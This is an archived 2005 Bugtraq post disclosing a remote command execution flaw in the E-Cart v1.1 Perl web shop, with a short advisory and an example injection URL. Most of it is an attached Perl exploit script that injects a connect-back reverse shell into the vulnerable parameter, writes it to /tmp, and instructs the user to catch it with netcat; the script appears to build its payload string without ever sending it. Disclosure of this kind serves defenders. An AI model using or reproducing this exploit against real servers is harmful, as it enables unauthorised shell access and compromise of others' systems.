[38574] in bugtraq
E-Cart v1.1 Remote Command Execution Vulnerability
daemon@ATHENA.MIT.EDU (Emanuele \"z\\\" Gentili)
Mon Apr 25 15:29:02 2005
Message-Id: <200504240215.j3O2FA8f000619@m-01.th.seeweb.it>
From: "Emanuele \"z\\\" Gentili" <emanuele@orvietolug.org>
To: <bugtraq@securityfocus.com>
Date: Sun, 24 Apr 2005 04:15:02 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01C54884.34AF3DF0"
This is a multi-part message in MIME format.
------=_NextPart_000_0006_01C54884.34AF3DF0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Exploit for "Cart v1.1 Remote Command Execution Vulnerability" discovery:
SoulBlack
============================================================
Title: E-Cart v1.1 Remote Command Execution Vulnerability discovery:
SoulBlack - Security Research - http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================
============================================================
*Summary
E-Cart is a mod of WepApp written in Perl. It is WebShop.
============================================================
*Problem Description:
The bug is in the file index.cgi where the variable art that is put under
"open()", does not have a control of data, allowing to the attacker to
execute any type of commands.
Vulnerable code
---------------
sub viewart {
&cartfooter;
open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data
= <DATA>); release(DATA); close(DATA);
...
...
...
============================================================
*Example:
http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=re
productordvp-ns315.dat|uname%20-a|
============================================================
*Xpl:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php
============================================================
*Fix:
Contact the Vendor.
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
------=_NextPart_000_0006_01C54884.34AF3DF0
Content-Type: application/octet-stream;
name="7330ecart.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="7330ecart.pl"
#!/usr/bin/perl
#
# info: emanuele@orvietolug.org
#
use IO::Socket;=20
print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <=3D E-Cart 2004 v1.1\n";
print " =
http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0 =
\n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";
print "hostname: \n";=20
chomp($server=3D<STDIN>); =20
print "port: (default: 80)\n";
chomp($port=3D<STDIN>);
$port=3D80 if ($port =3D~/\D/ );
$port=3D80 if ($port eq "" );
print "path: (/cgi-bin/ecart/)\n";
chomp($path=3D<STDIN>);
print "your ip (for reverse connect): \n";
chomp($ip=3D<STDIN>);
print "your port (for reverse connect): \n";
chomp($reverse=3D<STDIN>);
print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";
print "[*] try to exploiting...\n";=20
$string=3D"/$path/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&art=3D=
reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute=3D 'echo =
"`uname -a`";echo =
"`id`";/bin/sh';$target=3D$ARGV[0];$port=3D$ARGV[1];$iaddr=3Dinet_aton($t=
arget) || die("Error: $!\n");$paddr=3Dsockaddr_in($port, $iaddr) || =
die("Error: $!\n");$proto=3Dgetprotobyname('tcp');socket(SOCKET, =
PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, =
$paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, =
">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." =
>>cbs.pl;perl cbs.pl $ip $reverse|";
print "[*] OK! \n";=20
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=3DIO::Socket::INET->new( PeerAddr =3D> $server, PeerPort =3D> =
$port, Proto =3D> tcp)=20
or die;=20
print $socket "POST $path HTTP/1.1\n";=20
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu =
us.ircnet.org\n\n\n";
------=_NextPart_000_0006_01C54884.34AF3DF0--
